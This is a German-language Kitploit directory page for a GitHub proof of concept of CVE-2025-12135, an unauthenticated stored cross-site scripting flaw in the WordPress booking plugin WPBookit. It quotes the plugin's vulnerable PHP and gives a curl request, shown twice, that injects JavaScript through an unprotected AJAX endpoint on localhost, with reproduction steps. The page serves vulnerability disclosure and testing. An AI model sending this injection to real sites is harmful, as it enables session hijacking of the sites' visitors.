Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-12135 — WPBookit <= 1.0.6 - Nicht authentifiziertes gespeichertes Cross-Site Scripting | Kitploit
Tools/GitHubGitHub/d0n601/cve-2025-12135
Statische Code-Analyse (SAST)SchwachstellenanalyseCode-AnalyseWebanwendungs-ExploitationAuthentifizierungFehlkonfiguration
GitHubd0n601/cve-2025-12135

CVE-2025-12135

WPBookit <= 1.0.6 - Nicht authentifiziertes gespeichertes Cross-Site Scripting

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WPBookit <= 1.0.6 - Nicht authentifiziertes gespeichertes Cross-Site-Scripting

Das WPBookit-Plugin validiert weder Benutzerberechtigungen noch bereinigt es benutzerdefinierten CSS/JS-Code in seinem save_custome_code-AJAX-Endpunkt. Dadurch können nicht authentifizierte Angreifer beliebiges JavaScript injizieren, das bei jedem Seitenaufruf ausgeführt wird, was zu gespeichertem XSS und möglicherweise zu Session-Hijacking führt.

TL;DR-Exploits

root@kitploit:~
# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

Details

Die Schwachstelle existiert in der Methode save_custome_code der Klasse WPB_Setting_Controller. Das Plugin registriert AJAX-Endpunkte für nicht authentifizierte Benutzer und erlaubt so jedem Besucher, beliebigen CSS/JS-Code zu injizieren, der bei jedem Seitenaufruf ausgeführt wird.

Verwundbarer Code aus /core/admin/classes/controllers/class.wpb-setting-controller.php:16-25:

root@kitploit:~
public function save_custome_code(WP_REST_Request $request){
    $css_code= $request->get_param('css_code');
    $js_code= $request->get_param('js_code');
    update_option( 'wpb_custom_code_data', [  'css_code' => $css_code,  'js_code' => $js_code ]);
}

Codeausführung aus /core/shortcodes/class-wpbookit-shortcode-abstract.php:20-27:

root@kitploit:~
$wpb_custom_code= get_option( 'wpb_custom_code_data', [  'css_code' => '',  'js_code' => '' ]);

wp_add_inline_style( 'wpb-custom-code-css', stripslashes($wpb_custom_code['css_code']));
wp_add_inline_script( 'wpb-custom-code-js', stripslashes($wpb_custom_code['js_code']) );

Nicht authentifizierter Zugriff aus /core/admin/classes/class.wpb-admin-routes-handler.php:15-16:

root@kitploit:~
add_action( "wp_ajax_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
add_action( "wp_ajax_nopriv_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );

Routenkonfiguration aus /core/admin/classes/class.wpb-admin-routes.php:118-123:

root@kitploit:~
'save_custome_code' => [
    'method' => 'post',
    'action' => 'WPB_Setting_Controller@save_custome_code',
    'nonce' => 0,
    'module' => 'setting-controller'
],

Manuelle Reproduktion

  1. Ziel identifizieren mit installiertem WPBookit-Plugin
  2. Bösartiges JavaScript injizieren:
root@kitploit:~
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"
  1. Injektion verifizieren, indem man eine beliebige Seite auf der Website besucht – der Alert wird ausgeführt
  2. Persistenz überprüfen – der bösartige Code wird in der Datenbank gespeichert und bei jedem Seitenaufruf ausgeführt
Tool herunterladen